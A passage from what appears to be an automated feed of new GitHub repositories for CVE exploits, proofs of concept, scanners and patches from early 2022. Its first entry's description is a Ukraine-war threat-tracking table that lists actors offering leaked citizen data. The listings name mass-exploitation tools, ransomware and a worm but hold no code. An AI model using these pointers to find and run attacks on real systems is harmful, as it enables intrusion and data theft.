(mvs[.]gov[.]ua)                                                      | No        | TA discussion in past 90 days | RaidForums [not linked; site hijacked since UA invasion] | ​| NetSec          | UA data sharing | PII DB (53M) of Ukrainian citizens                                                                        | No        | TA discussion in past 90 days | RaidForums [not linked; site hijacked since UA invasion] | ​| Psycho_Killer  | UA data sharing | PII DB (56M) of Ukrainian Citizens                                                                        | No        | TA discussion in past 90 days | Exploit Forum .onion [not linked]                        | ​| Sp333           | UA data sharing | PII DB of Ukrainian and Russian interpreters, translators, and tour guides                                | No        | TA discussion in past 90 days | RaidForums [not linked; site hijacked since UA invasion] | ​| Vaticano        | UA data sharing | DB of Ukrainian 'Diia' e-Governance Portal for Ministry of Digital Transformation of Ukraine [copy]     | No        | TA discussion in past 90 days | RaidForums [not linked; site hijacked since UA invasion] | ​| Vaticano        | UA data sharing | DB of Ministry for Communities and Territories Development of Ukraine (minregion[.]gov[.]ua) [copy] | No        | TA discussion in past 90 days | RaidForums [not linked; site hijacked since UA invasion] | ​####​ ​Vendor Support ​| Vendor | Offering | URL | ​| --- | --- | --- | ​| Dragos | Access to Dragos service if from US/UK/ANZ and in need of ICS cybersecurity support | twitter.com/RobertMLee | ​| GreyNoise |  Any and all Ukrainian emails registered to GreyNoise have been upgraded to VIP which includes full, uncapped enterprise access to all GreyNoise products | twitter.com/Andrew___Morris | ​| Recorded Future | Providing free intelligence-driven insights, perspectives, and mitigation strategies as the situation in Ukraine evolves| recordedfuture.com | ​| Flashpoint | Free Access to Flashpoint’s Latest Threat Intel on Ukraine | go.flashpoint-intel.com | ​| ThreatABLE | A Ukraine tag for free threat intelligence feed that's more highly curated to cyber| twitter.com/threatable | ​| Orange | IOCs related to Russia-Ukraine 2022 conflict extracted from our Datalake Threat Intelligence platform. | github.com/Orange-Cyberdefense| ​| FSecure | F-Secure FREEDOME VPN is now available for free in all of Ukraine | twitter.com/FSecure | ​| Multiple vendors | List of vendors offering their services to Ukraine for free, put together by @chrisculling | docs.google.com/spreadsheets | ​| Mandiant | Free threat intelligence, webinar and guidance for defensive measures relevant to the situation in Ukraine. | mandiant.com | ​| Starlink | Satellite internet constellation operated by SpaceX providing satellite Internet access coverage to Ukraine | twitter.com/elonmusk | ​| Romania DNSC | Romania’s DNSC – in partnership with Bitdefender – will provide technical consulting, threat intelligence and, free of charge, cybersecurity technology to any business, government institution or private citizen of Ukraine for as long as it is necessary. | Romania's DNSC Press Release| ​| BitDefender | Access to Bitdefender technical consulting, threat intelligence and both consumer and enterprise cybersecurity technology | bitdefender.com/ukraine/ | ​| NameCheap | Free anonymous hosting and domain name registration to any anti-Putin anti-regime and protest websites for anyone located within Russia and Belarus | twitter.com/Namecheap | ​| Avast | Free decryptor for PartyTicket ransomware | decoded.avast.io |  ​####​ ​Vetted OSINT Sources ​| Handle | Affiliation | ​| --- | --- | ​| @KyivIndependent | English-language journalism in Ukraine | ​| @IAPonomarenko | Defense reporter with The Kyiv Independent | ​| @KyivPost | English-language journalism in Ukraine | ​| @Shayan86 | BBC World News Disinformation journalist | ​| @Liveuamap | Live Universal Awareness Map (“Liveuamap”) independent global news and information site | ​| @DAlperovitch | The Alperovitch Institute for Cybersecurity Studies, Founder & Former CTO of CrowdStrike | ​| @COUPSURE | OSINT investigator for Centre for Information Resilience | ​| @netblocks | London-based Internet's Observatory | ​####​ ​Miscellaneous Resources ​| Source | URL | Content | ​| --- | --- | --- | ​| PowerOutages.com | https://poweroutage.com/ua | Tracking PowerOutages across Ukraine | ​| Monash IP Observatory | https://twitter.com/IP_Observatory | Tracking IP address outages across Ukraine | ​| Project Owl Discord | https://discord.com/invite/projectowl | Tracking foreign policy, geopolitical events, military and governments, using a Discord-based crowdsourced approach, with a current emphasis on Ukraine and Russia | ​| russianwarchatter.info | https://www.russianwarchatter.info/ | Known Russian Military Radio Frequencies | : Nate0634034090/bug-free-memory create time: 2022-03-04T09:00:59Z

cve-2022-22947 spring cloud gateway 批量扫描脚本 : dingxiao77/-cve-2022-22947- create time: 2022-03-04T07:24:58Z

CVE-2021-42013批量 : tangxiaofeng7/CVE-2022-22947-Spring-Cloud-Gateway create time: 2022-03-04T06:38:26Z

日常更新一些顺手写的gobypoc,包含高危害EXP : york-cmd/CVE-2022-22947-goby create time: 2022-03-04T05:45:05Z

Exp : BerMalBerIst/CVE-2022-22947 create time: 2022-03-04T05:26:33Z

poc for cve-2022-22947 : scopion/cve-2022-22947 create time: 2022-03-03T09:30:37Z

port of CVE-2021-4034 exploit to Rust/cargo for my own edification : defhacks/cve-2021-4034 create time: 2022-03-04T03:47:53Z

Spring Cloud Gateway远程代码执行漏洞 : Summer177/Spring-Cloud-Gateway-CVE-2022-22947- create time: 2022-03-04T02:36:02Z

Spring Cloud Gateway Actuator API SpEL表达式注入命令执行(CVE-2022-22947) : helloexp/CVE-2022-22947 create time: 2022-03-04T02:29:02Z

no description : Greetdawn/CVE-2022-22947 create time: 2022-03-04T02:27:50Z

no description : skentagon/CVE-2021-41773 create time: 2022-02-27T22:39:58Z

SpringCloudGatewayRCE - CVE-2022-22947 / Code By:Tas9er : Tas9er/SpringCloudGatewayRCE create time: 2022-03-03T19:45:18Z

CVE-2021-4034 : Jesrat/make_me_root create time: 2022-03-03T18:29:11Z

Spring Cloud Gateway < 3.0.7 & < 3.1.1 Code Injection (RCE) : carlosevieira/CVE-2022-22947 create time: 2022-03-03T18:26:18Z

no description : micha3lcve/CVE-2021-44228-Mass-RCE create time: 2022-03-03T17:18:43Z

RFI to RCE Nagios/NagiosXI exploitation : ArianeBlow/NagiosXI-RCE-all-version-CVE-2021-40345 create time: 2021-06-02T21:39:53Z

Spring_CVE_2022_22947:Spring Cloud Gateway现高风险漏洞cve,poc漏洞利用,一键利用,开箱即用 : wjl110/Spring_CVE_2022_22947 create time: 2022-03-03T16:56:37Z

Spring Cloud Gateway 远程代码执行漏洞Exp Spring_Cloud_Gateway_RCE_Exp-CVE-2022-22947 : Axx8/CVE-2022-22947_Rce_Exp create time: 2022-03-03T13:13:02Z

Spring cloud gateway code injection : CVE-2022-22947 : Vulnmachines/spring-cve-2022-22947 create time: 2022-03-03T11:14:37Z

CVE-2022-22947 RCE : shakeman8/CVE-2022-22947-RCE create time: 2022-03-03T10:44:36Z

This repository contains files for reproducing the vulnerability. : yasin-cs-ko-ak/grafana-cve-2021-43798 create time: 2022-03-03T09:37:46Z

poc for cve-2022-22947 : cgddgc/cve-2022-22947 create time: 2022-03-03T09:24:36Z

Kali linux _ CVE 2019 - 2022 : AhnSungHoon/Kali_CVE create time: 2022-03-03T07:16:21Z

Test tool for CVE-2020-1472 : Anonymous-Family/CVE-2020-1472 create time: 2022-03-03T02:00:21Z

Zero-day-scanning is a Domain Controller vulnerability scanner, that currently includes checks for Zero-day-scanning (CVE-2020-1472), MS-PAR/MS-RPRN and SMBv2 Signing. : Anonymous-Family/Zero-day-scanning create time: 2022-03-03T01:55:28Z

Exploiting Linux Kernel Vulnerability: Dirty Cow (CVE-2016-5195) : ellietoulabi/Dirty-Cow create time: 2022-03-02T19:06:36Z

CVE-2018-11235-Git-Submodule-CE + Docker Ngrok Configuration : twseptian/CVE-2018-11235-Git-Submodule-CE-and-Docker-Ngrok-Configuration create time: 2022-03-02T16:26:52Z

A "Creation of Temporary Files in Directory with Insecure Permissions" vulnerability in PrintixService.exe, in Printix's "Printix Secure Cloud Print Management", Version 1.3.1106.0 and below allows any logged in user to elevate any executable or file to the SYSTEM context. This is achieved by exploiting race conditions in the Installer. : ComparedArray/printix-CVE-2022-25090 create time: 2022-03-02T13:14:11Z

no description : takumak/cve-2019-5736-reproducer create time: 2022-03-02T14:57:08Z

polkit-pkexec local privilege escalation vulnerability : Xuanyaz/CVE-2021-4034 create time: 2022-03-02T13:07:00Z

no description : lucksec/Spring-Cloud-Gateway-CVE-2022-22947 create time: 2022-03-02T11:58:55Z

Tools for get offsets and adding patch for support i386 : usernameid0/tools-for-CVE-2018-1000001 create time: 2022-03-01T21:27:37Z

no description : PaloAltoNetworks/can-ctr-escape-cve-2022-0492 create time: 2022-02-28T01:25:26Z

CVE-2022-23361 : ViNi0608/CVE-2022-23361 create time: 2022-03-01T17:08:19Z

no description : usernameid0/CVE-2018-1000857-i386 create time: 2022-03-01T17:13:01Z

no description : Mr-xn/CVE-2022-25064 create time: 2022-03-01T15:10:20Z

cve-2018-6574 : twseptian/cve-2018-6574 create time: 2022-03-01T13:42:50Z

iOS 15.1 kernel exploit POC for CVE-2021-30955 : b1n4r1b01/desc_race create time: 2022-03-01T12:41:03Z

https://gist.github.com/jakeajames/37f72c58c775bfbdda3aa9575149a8aa compiled into a ipa : verygenericname/CVE-2021-30955-POC-IPA create time: 2022-02-28T23:28:39Z

Proof of concept (wrapped into an iOS app) for CVE-2021-30955 : nickorlow/CVE-2021-30955-POC create time: 2022-02-28T22:23:51Z

This script is intended to validate Apache Struts 2 vulnerability (CVE-2017-5638), AKA Struts-Shock. : readloud/CVE-2017-5638 create time: 2022-02-28T14:49:52Z

no description : timb-machine-mirrors/CVE-2021-30955 create time: 2022-02-28T14:54:10Z

A python exploit to automatically dump all the data stored by the auto-completion plugin of Ametys CMS to a local sqlite database file. : p0dalirius/CVE-2022-26159-Ametys-Autocompletion-XML create time: 2022-02-21T19:59:11Z

Zabbix - SAML SSO Authentication Bypass : kh4sh3i/CVE-2022-23131 create time: 2022-02-28T10:37:02Z

POC for KeePass [CVE-2022-0725] : ByteHackr/keepass_poc create time: 2022-02-28T06:53:37Z

CVE-2022-0529 & CVE-2022-0530 : ByteHackr/unzip_poc create time: 2022-02-28T05:44:52Z

CVE-2022-0529 & CVE-2022-0530 : nanaao/unzip_poc create time: 2022-02-28T05:20:03Z

no description : movvamrocks/PwnKit-CVE-2021-4034 create time: 2022-02-28T04:41:40Z

Android Ransomware Development - AES256 encryption + CVE-2019-2215 + Data Exfiltration : nicchongwb/Rootsmart-v2.0 create time: 2022-02-28T02:34:31Z

no description : l00neyhacker/CVE-2022-26158 create time: 2022-02-28T03:51:56Z

no description : l00neyhacker/CVE-2022-26157 create time: 2022-02-28T03:51:05Z

no description : l00neyhacker/CVE-2022-26156 create time: 2022-02-28T03:50:12Z

no description : l00neyhacker/CVE-2022-26155 create time: 2022-02-28T03:47:15Z

CVE-2022-1111 : KiritoLoveAsuna/CVE-2022-1111 create time: 2022-02-28T01:08:03Z

kctf exploit : shahparkhan/cve-2022-0185 create time: 2022-02-27T13:42:02Z

no description : Fa1c0n35/zabbix-cve-2022-23131 create time: 2022-02-27T11:30:53Z

PoC for CVE-2022-21971 "Windows Runtime Remote Code Execution Vulnerability" : 0vercl0k/CVE-2022-21971 create time: 2022-02-26T20:37:42Z

PoC for CVE-2022-21974 "Roaming Security Rights Management Services Remote Code Execution Vulnerability" : 0vercl0k/CVE-2022-21974 create time: 2022-02-26T18:53:56Z

Exploit PoC for CVE-2020-18326 : hamm0nz/CVE-2020-18326 create time: 2022-02-26T17:30:41Z

no description : hamm0nz/CVE-2020-18325 create time: 2022-02-26T17:06:09Z

Tor Browser 9.0.7 on Windows 10 build 10586 is vulnerable to information disclosure. This could allow local attackers to bypass the intended anonymity feature and obtain information regarding the onion services visited by a local user. This can be accomplished by analyzing RAM memory even several hours after the local user used the product. This occurs because the product doesn't properly free memory. : malakkf/CVE-2021-46702 create time: 2022-02-26T13:52:44Z

CVE-2022-24086 RCE : shakeman8/CVE-2022-24086-RCE create time: 2022-02-26T10:12:45Z

no description : innxrmxst/CVE-2021-3560 create time: 2022-02-25T20:30:31Z

Apache APISIX batch-requests RCE(CVE-2022-24112) : Axx8/CVE-2022-24112 create time: 2022-02-25T15:17:28Z

Script to demonstrate the Grafana directory traversal exploit (CVE-2021-43798). : Jroo1053/GrafanaDirInclusion create time: 2022-02-25T09:26:40Z

no description : MoritzHuppert/CVE-2022-25022 create time: 2022-02-25T08:26:12Z

no description : MoritzHuppert/CVE-2022-25020 create time: 2022-02-25T08:24:44Z

no description : MoritzHuppert/CVE-2022-25018 create time: 2022-02-25T08:23:49Z

POC for CVE-2022-24124 : ColdFusionX/CVE-2022-24124 create time: 2022-02-25T07:55:55Z

no description : hahaleyile/CVE-2021-4034 create time: 2022-02-25T01:30:09Z

Python Scanner for TestRail servers vulnerable to CVE-2021-40875 : Lul/TestRail-files.md5-IAC-scanner create time: 2022-02-24T19:52:01Z

no description : bkojusner/CVE-2021-25461 create time: 2022-02-24T17:28:58Z

Exploit PoC of CVE-2020-18324 : hamm0nz/CVE-2020-18324 create time: 2022-02-24T15:38:11Z

A fully automated, accurate, and extensive scanner for finding log4j RCE CVE-2021-44228 : Ananya-0306/Log-4j-scanner create time: 2022-02-24T13:49:14Z

Exploit for CVE-2022-22845 - Unauthenticated Admin Takeover On QXIP SIPCAPTURE Homer-App up to 1.4.27 : OmriBaso/CVE-2022-22845-Exploit create time: 2022-02-24T13:40:12Z

no description : pykiller/CVE-2022-23131 create time: 2022-02-24T11:34:27Z

Automated PoC of CVE-2021-44521 : QHpix/CVE-2021-44521 create time: 2022-02-24T11:07:34Z

no description : trganda/CVE-2022-23131 create time: 2022-02-24T08:10:46Z

Zabbix SSO Bypass : random-robbie/cve-2022-23131-exp create time: 2022-02-23T16:34:03Z

no description : polling-repo-continua/CVE-2022-25257 create time: 2022-02-20T06:42:24Z

CVE-2022-0529 & CVE-2022-0530 : ByteHackr/unzip_poc create time: 2022-02-23T14:15:53Z

no description : pazhanivel07/frameworks_av-10-r33_CVE-2020-0242 create time: 2022-02-23T11:48:10Z

no description : pazhanivel07/frameworks_base_CVE-2020-0209 create time: 2022-02-23T10:44:33Z

no description : Blackyguy/-CVE-2012-2661-ActiveRecord-SQL-injection- create time: 2022-02-23T10:15:59Z

no description : pazhanivel07/Settings_10-r33_CVE-CVE-2020-0219 create time: 2022-02-23T10:10:23Z

Writeup(malay) ''Coming soon" : Blackyguy/CVE-2012-2661-ActiveRecord-SQL-injection create time: 2022-02-23T09:15:42Z

An exploit for CVE-2020-6418 implementing a SHELF Loader. Published as part of Tmp.0ut volume 2 : ulexec/ChromeSHELFLoader create time: 2022-02-19T20:00:04Z

Apache APISIX apisix/batch-requests RCE : Udyz/CVE-2022-24112 create time: 2022-02-22T19:04:52Z

CVE-2022 : TheRealSlurpie/CVE-2022 create time: 2022-02-22T16:04:27Z

CVE-2022-24112:Apache APISIX apisix/batch-requests RCE : Mr-xn/CVE-2022-24112 create time: 2022-02-22T14:09:49Z

no description : UzJu/CVE-2022-21660 create time: 2022-02-22T09:50:09Z

no description : mxypoo/CVE-2016-3116-DropbearSSH create time: 2022-02-22T06:59:55Z

no description : mtthwstffrd/dirkjanm-CVE-2020-1472 create time: 2022-02-22T03:33:38Z

no description : mtthwstffrd/SecuraBV-CVE-2020-1472 create time: 2022-02-22T03:33:24Z

no description : mtthwstffrd/calebstewart-CVE-2021-1675 create time: 2022-02-22T03:32:34Z

no description : mtthwstffrd/cube0x0-CVE-2021-1675 create time: 2022-02-22T03:32:14Z

cve-2022-23131 : L0ading-x/cve-2022-23131 create time: 2022-02-22T01:39:52Z

CVE-2021-3560 Polkit v0.105-26 Linux Privilege Escalation PoC by Vivald0x6f : Nosferatuvjr/Vivald0x6f create time: 2022-02-21T21:39:29Z

Changelog CVE-2021-33044,CVE-2021-33045 Identity authentication bypass vulnerability found in some Dahua products CVE-2021-27248,CVE-2021-27249,CVE-2021-27250,CVE-2021-34860,CVE-2021-34861,CVE-2021-34862,CVE-2021-34863 Multiple vulnerabilities in DAP-2020 H/W rev. Ax with F/W v1.01 and below HTTP Path Traversal CVE-2019-7406 RCE vulnerability in TP-Link Wi-Fi Extenders via a malformed user agent field in HTTP headers CVE-2020-2501,CVE-2021-28797 Stack Buffer Overflow in QNAP Surveillance Station CVE-2021-34730 Critical UPnP Service Flaw on Cisco Small Business RV Series Routers CVE-2020-35785 Multiple HTTP authentication vulnerabilities on DGN2200v1 : Alonzozzz/alonzzzo create time: 2022-02-21T21:22:43Z

A repository housing the exploit code for CVE-2021-27965, a stack-buffer overflow vulnerability in MsIo.sys. : Leo-Security/CVE-2021-27965-Win10-20H2-x64 create time: 2022-02-21T20:31:17Z

no description : Tanmay-N/CVE-2021-4034 create time: 2022-02-21T16:54:38Z

CVE-2022-21907 Mass Exploitation tool written in Python 3 compatible with lists of URL/IPs. For a large number of targets you can increase the number of threads, we don't recommend more than 1024. This tool is NOT free to prevent abuse and do not expect to find a fix-it-all proof of concept for exploitation for free. Only for those knowledgeable. : coconut20/CVE-2022-21907 create time: 2022-02-21T16:28:39Z

An easy to use Python package to exploit ICSA-17-124-01 / CVE-2017-7921 in HikVision camera's. : NFIRBV/krijg-de-hik create time: 2022-02-21T13:38:55Z

This is the repository used for CVE-2017-7651 for exploiting mosquitto 1.4.14 : St3v3nsS/CVE-2017-7651 create time: 2022-02-21T12:54:41Z

CVE-2022-24112 check : shakeman8/CVE-2022-24112 create time: 2022-02-21T11:52:28Z

exiftool exploit : tuhin81/CVE-2021-22204-exiftool create time: 2022-02-21T11:07:19Z

no description : AS4mir/CVE-2021-45008 create time: 2022-02-21T09:00:38Z

poc : zwjjustdoit/cve-2022-23131 create time: 2022-02-21T02:42:23Z

no description : 0tt7/CVE-2022-23131 create time: 2022-02-21T00:51:14Z

CVE-2022-25375 - Demo exploit of RNDIS USB Gadget : szymonh/rndis-co create time: 2022-02-17T14:02:58Z

Proof Of Concept for the 2021's pkexec vulnerability CVE-2021-4034 : JoaoFukuda/CVE-2021-4034_POC create time: 2022-02-20T17:49:21Z

no description : BL0odz/CVE-2021-40449-NtGdiResetDC-UAF create time: 2022-02-20T16:23:26Z

CVE-2022-24086 about Magento RCE : Mr-xn/CVE-2022-24086 create time: 2022-02-20T13:52:31Z

no description : foxtrot/CVE-2021-1965 create time: 2022-02-20T00:52:01Z

Fancy Zerologon Beta : Exploitspacks/CVE-2020-1472 create time: 2022-02-19T23:51:30Z

PrintNightmare+Manual : Exploitspacks/CVE-2021-34527-CVE-2021-1675 create time: 2022-02-19T23:20:58Z

Fully modified exploit for Ms17-010 : Exploitspacks/MS17-010-2017-2997-CVE-2017-2998-CVE-2017-2999-CVE-2017-3000-CVE-2017-3001-CVE-2017-3002-CVE-2017-3 create time: 2022-02-19T22:45:52Z

Modified exploit : Exploitspacks/CVE-2019-0708 create time: 2022-02-19T22:39:05Z

A full-fledged exploit for CVE-2018-13379-CVE-2020-12812-CVE-2019-5591 and not only with a powershell parser. Any evidence : Exploitspacks/CVE-2018-13379-CVE-2020-12812-CVE-2019-5591 create time: 2022-02-19T22:30:47Z

Vulnerability: CVE-2020-0787 (Published: March 10, 2020) Supported versions: Vista/2008/W7/2008R2/W8/2012/W8.1/2012R2/W10/2016/2019 Supported architecture: x86/x64 Development stage: v1.0.20130 (stable) Code size: 36Kb : Exploitspacks/CVE-2020-0787 create time: 2022-02-19T22:18:00Z

SonicWall Exploit CVE-2021-20028 : Exploitspacks/CVE-2021-20028 create time: 2022-02-19T21:43:51Z

no description : dhammon/HotelDruid-CVE-2021-42949 create time: 2022-02-19T21:02:42Z

no description : dhammon/HotelDruid-CVE-2021-42948 create time: 2022-02-19T21:01:12Z

Cross-Site Request Forgery : AS4mir/CVE-2021-45007 create time: 2022-02-19T15:28:59Z

CVE-2021-1965 WiFi Zero Click RCE Trigger PoC : parsdefense/CVE-2021-1965 create time: 2022-02-18T14:19:58Z

no description : 1mxml/CVE-2022-23131 create time: 2022-02-18T14:48:53Z

no description : parsdefense/CVE-2021-1965 create time: 2022-02-18T11:54:48Z

cve-2022-23131 zabbix-saml-bypass-exp : Mr-xn/cve-2022-23131 create time: 2022-02-18T11:51:47Z

CVE-2021-4034 POC and Docker and simple Analysis write up : chenaotian/CVE-2022-0185 create time: 2022-02-18T09:27:34Z

cve-2022-23131 exp : jweny/zabbix-saml-bypass-exp create time: 2022-02-18T08:38:53Z

pkexec EoP exploit : LJP-TW/CVE-2021-4034 create time: 2022-02-17T13:17:07Z

no description : LeQuocKhanh2K/Tool_Exploit_Password_Camera_CVE-2018-9995 create time: 2022-02-18T03:17:31Z

no description : qq1549176285/CVE-2022-23131 create time: 2022-02-18T03:03:26Z

no description : LeQuocKhanh2K/Tool_Camera_Exploit_Netwave_CVE-2018-6479 create time: 2022-02-18T02:33:04Z

Skeleton (but pronounced like Peloton): A Zero-Click RCE exploit for CVE-2021-0326 : aemmitt-ns/skeleton create time: 2022-01-17T21:35:19Z

Hotel Druid 3.0.3 Code Injection to Remote Code Execution : 0z09e/CVE-2022-22909 create time: 2022-02-17T17:18:02Z

no description : RobertDra/CVE-2022-25257 create time: 2022-02-17T13:29:26Z

no description : RobertDra/CVE-2022-25256 create time: 2022-02-17T13:11:08Z

An exploit script of CVE-2016-5195 : th3-5had0w/DirtyCOW-PoC create time: 2022-02-17T11:57:08Z

no description : tranmanhdat/couchdb_cve-2017-12635 create time: 2022-02-17T09:25:26Z

no description : RobertDra/CVE-2022-25256 create time: 2022-02-17T10:14:05Z

CVE-2022-25258 - Demo exploit targeting usb gadget's os descriptor handler : szymonh/d-os-descriptor create time: 2022-02-15T09:04:25Z

POC en Python para el CVE-2012-2982 mejorado del original por el usuario @OstojaOfficial : blu3ming/CVE-2012-2982 create time: 2022-02-16T20:00:36Z

cve-2022-24086 patch for Magento 1.9 : wambo-co/magento-1.9-cve-2022-24086 create time: 2022-02-16T08:50:33Z

CVE-2018-15473 : Goldenmonkeyy/SSHusernameEnum create time: 2022-02-16T05:27:00Z

Rust implementation of the Log 4 Shell (log 4 j - CVE-2021-44228) : s-retlaw/l4srs create time: 2022-02-16T01:13:08Z

Local and Remote scan for shellshock vulnerability for Bash versions lower than 4.3. [CVE-2014-6271].* : 0bfxgh0st-secondary/ShellShock create time: 2022-02-15T16:48:14Z

no description : r1l4-i3pur1l4/CVE-2021-1732 create time: 2022-02-15T16:55:31Z

CVE-2021-22005 vcenter任意文件上传批量验证poc : chaosec2021/CVE-2021-22005poc create time: 2022-02-15T13:11:04Z

NoPacScan is a CVE-2021-42287/CVE-2021-42278 Scanner,it scan for more domain controllers than other script : knightswd/NoPacScan create time: 2022-01-07T11:59:55Z

测试测试 : MrShiF/CVE-2022-23888 create time: 2022-02-15T09:31:13Z

SAP memory pipes(MPI) desynchronization vulnerability CVE-2022-22536. : antx-code/CVE-2022-22536 create time: 2022-02-15T09:22:19Z

ceshiceshi : MrShiF/CVE-2022-1 create time: 2022-02-15T07:01:52Z

测试测试 : MrShiF/CVE-2022-1-15 create time: 2022-02-15T06:32:33Z

CVE-2021-4034 centos8可用版本 : ck00004/CVE-2021-4034 create time: 2022-02-15T02:34:48Z

Build the struts-2.3.31 (CVE-2017-5638) environment : testpilot031/vulnerability_struts-2.3.31 create time: 2022-02-15T00:38:47Z

SQL Injection Vulnerability on PhpIPAM v1.4.4 : dnr6419/CVE-2022-23046 create time: 2022-02-15T00:00:22Z

All stages of exploring the polkit CVE-2021-4034 using codeql : hohn/codeql-sample-polkit create time: 2022-02-14T22:09:44Z

no description : r1l4-i3pur1l4/CVE-2022-21882 create time: 2022-02-14T21:28:15Z

Adminer is an open-source database management in a single PHP file. In adminer from version 4.0.0 and before 4.7.9 there is a server-side request forgery vulnerability. Users of Adminer versions bundling all drivers (e.g. adminer.php) are affected. This is fixed in version 4.7.9. : llhala/CVE-2021-21311 create time: 2022-02-14T18:54:53Z

Proof of Concept for EFSRPC Arbitrary File Upload (CVE-2021-43893) : jbaines-r7/blankspace create time: 2022-02-04T17:11:00Z

Stored XSS Vulnerability on RosarioSIS 8.2.1 : dnr6419/CVE-2021-45416 create time: 2022-02-14T07:31:01Z

no description : rohankumardubey/CVE-2022-20699 create time: 2022-02-14T06:23:06Z

CVE-2021-3156 deep dive. : ret2basic/sudoscience create time: 2022-02-14T04:24:03Z

no description : soffensive/CVE-2018-6574 create time: 2022-02-13T18:05:33Z

A tool to automate the exploit PWNKIT (CVE-2021-4034) : x04000/AutoPwnkit create time: 2022-02-13T14:51:47Z

A simple PWNKIT file to convert you to root : x04000/CVE-2022-4034 create time: 2022-02-13T11:37:43Z

f4T1H's PoC script for CVE-2021-3560 Polkit D-Bus Privilege Escalation : f4T1H21/CVE-2021-3560-Polkit-DBus create time: 2022-02-13T10:12:51Z

pwncat module that automatically exploits CVE-2021-4034 (pwnkit) : DanaEpp/pwncat_pwnkit create time: 2022-02-13T00:05:32Z

no description : purple-WL/Jenkins_CVE-2019-1003000 create time: 2022-02-12T11:26:07Z

Log4j vulnerability testing environment that based on CVE-2021-44228. This environment provide guidance to build the sample infrastructure and the exploit scripts : hotpotcookie/lol4j-white-box create time: 2022-02-12T11:19:41Z

no description : purple-WL/wordpress-CVE-2022-21661 create time: 2022-02-12T11:31:26Z

CVE-2014-1767在win7_x64平台的EXP和分析文章 : ExploitCN/CVE-2014-1767-EXP-PAPER create time: 2022-02-12T08:57:19Z

no description : an0n7os/CVE-2021-4034 create time: 2022-02-12T06:20:49Z

This repository is for Log4j 2021 (CVE-2021-44228) Vulnerability demonstration and mitigation. : FeryaelJustice/Log4Shell create time: 2022-02-12T03:02:24Z

POC - CVE-2020-9484 : ColdFusionX/CVE-2020-9484 create time: 2022-02-11T15:45:10Z

This is a repo about some hacking scripts to make your hacks better and easier.Please do not use these for illegal purposes, It also includes a C (CVE-2021-4034) : mutur4/Hacking-Scripts create time: 2021-12-29T15:00:00Z

no description : yuxiaokui/CVE-2022-xxxx create time: 2022-02-11T08:12:40Z

no description : gabe-k/CVE-2021-1883 create time: 2022-02-11T04:13:25Z

pwnkit exploit : cspshivam/cve-2021-4043 create time: 2022-02-11T04:06:21Z

CVE-2021-38647 AKA "OMIGOD" vulnerability in Windows OMI : corelight/CVE-2021-38647 create time: 2021-09-15T04:51:02Z

Exploit for command injection vulnerability found in uhttpd binary from TP-Link Tapo c200 IP camera : hacefresko/CVE-2021-4045-PoC create time: 2021-11-15T14:48:14Z

Proof of Concept for CVE-2021-1585: Cisco ASA Device Manager RCE : jbaines-r7/staystaystay create time: 2022-02-10T21:52:24Z

A Incorrect Use of a Privileged APIs vulnerability in PrintixService.exe, in Printix's "Printix Secure Cloud Print Management", Version 1.3.1035.0 and below allows Privilege Escalation to change values unrestricted in the Windows Registry via the UITasks.PersistentRegistryData parameter. : ComparedArray/printix-CVE-2022-Release-Carl create time: 2022-02-10T19:12:43Z

phpMyAdmin XSS : dipakpanchal456/CVE-2022-23808 create time: 2022-02-01T17:02:03Z

no description : puckiestyle/CVE-2022-20699 create time: 2022-02-10T14:40:25Z

CVE-2022-24348 Test : mochizuki875/helm-sample create time: 2022-02-10T09:55:41Z

docker lab setup for kibana-7609 : wolf1892/CVE-2019-7609 create time: 2022-02-10T06:22:54Z

PoC script that shows RCE vulnerability over Intellian Satellite controller : Xh4H/Satellian-CVE-2020-7980 create time: 2020-01-28T23:27:20Z

no description : lukejenkins/CVE-2022-24693 create time: 2022-02-09T18:28:00Z

CVE-2020-5842 Stored XSS Vulnerability in Codoforum 4.8.3 : prasanthc41m/codoforum create time: 2022-02-09T11:20:16Z

A local PoC exploit for CVE-2019-2205 : aemmitt-ns/pacpoc create time: 2022-02-09T02:08:50Z

no description : modubyk/CVE_2020_0601 create time: 2022-02-09T02:23:41Z

Exploit for CVE-2022–22718 - Windows Print Spooler Elevation of Privilege Vulnerability (LPE) : ly4k/SpoolFool create time: 2022-02-08T17:25:44Z

no description : TheGetch/CVE-2022-23378 create time: 2022-01-14T23:54:36Z

CVE-2012-1876 win7_x86和x64平台分析,EXP、POC代码和分析文档 : ExploitCN/CVE-2012-1876-win7_x86_and_win7x64 create time: 2022-02-08T13:03:18Z

local privilage esscalation vulnerablity : fireclasher/pwnkit-CVE-2021-4034- create time: 2022-02-08T03:55:23Z

A golang based exp for CVE-2021-4034 dubbed pwnkit (more features added......) : FDlucifer/Pwnkit-go create time: 2022-02-08T02:57:12Z

Ansible role to patch RHSB-2022-001 Polkit Privilege Escalation - (CVE-2021-4034) : ziadsaleemi/polkit_CVE-2021-4034 create time: 2022-02-08T00:09:31Z

a demonstration PoC for CVE-2022-21877 (storage spaces controller memory leak) : Big5-sec/cve-2022-21877 create time: 2022-02-07T23:18:17Z

Cisco Anyconnect VPN unauth RCE (rwx stack) : Audiobahn/CVE-2022-20699 create time: 2022-02-07T15:53:21Z

Worm written in python, abuses CVE-2020-7247 : presentdaypresenttime/shai_hulud create time: 2022-02-07T10:59:36Z

PoC for CVE-2021-4034. : pyhrr0/pwnkit create time: 2022-02-07T12:48:35Z

no description : 0x1ns4n3/CVE-2015-1328-Golden_Eye- create time: 2022-02-07T10:52:51Z

Wordpress Plugin Simple Job Board 2.9.3 LFI Vulnerability (CVE-2020-35749) proof of concept exploit : M4xSec/Wordpress-CVE-2020-35749 create time: 2022-02-06T14:52:22Z

no description : nxiwmd/cve-2022-yuio create time: 2022-02-07T08:33:45Z

no description : nxiwmd/CVE-2022-test333333 create time: 2022-02-07T08:20:50Z

no description : nxiwmd/CVE-2022-rtest2 create time: 2022-02-07T07:11:36Z

lpe poc for cve-2022-21882 : sailay1996/cve-2022-21882-poc create time: 2022-02-07T03:45:36Z

Polkit CVE-2021-4034 exploitation in High-Level Programming Language : Joffr3y/Polkit-CVE-2021-4034-HLP create time: 2022-02-06T19:42:59Z

no description : bughunt123/CVE-2020-5776 create time: 2022-02-06T16:03:02Z

Find similar issues like CVE-2022-24348 : jkroepke/CVE-2022-24348-2 create time: 2022-02-06T13:39:57Z

no description : R0rt1z2/CVE-2017-0505-mtk create time: 2022-02-04T22:43:21Z

PoC for PwnKit: Local Privilege Escalation Vulnerability in polkit’s pkexec in Python : ravindubw/CVE-2021-4034 create time: 2022-02-04T18:31:15Z

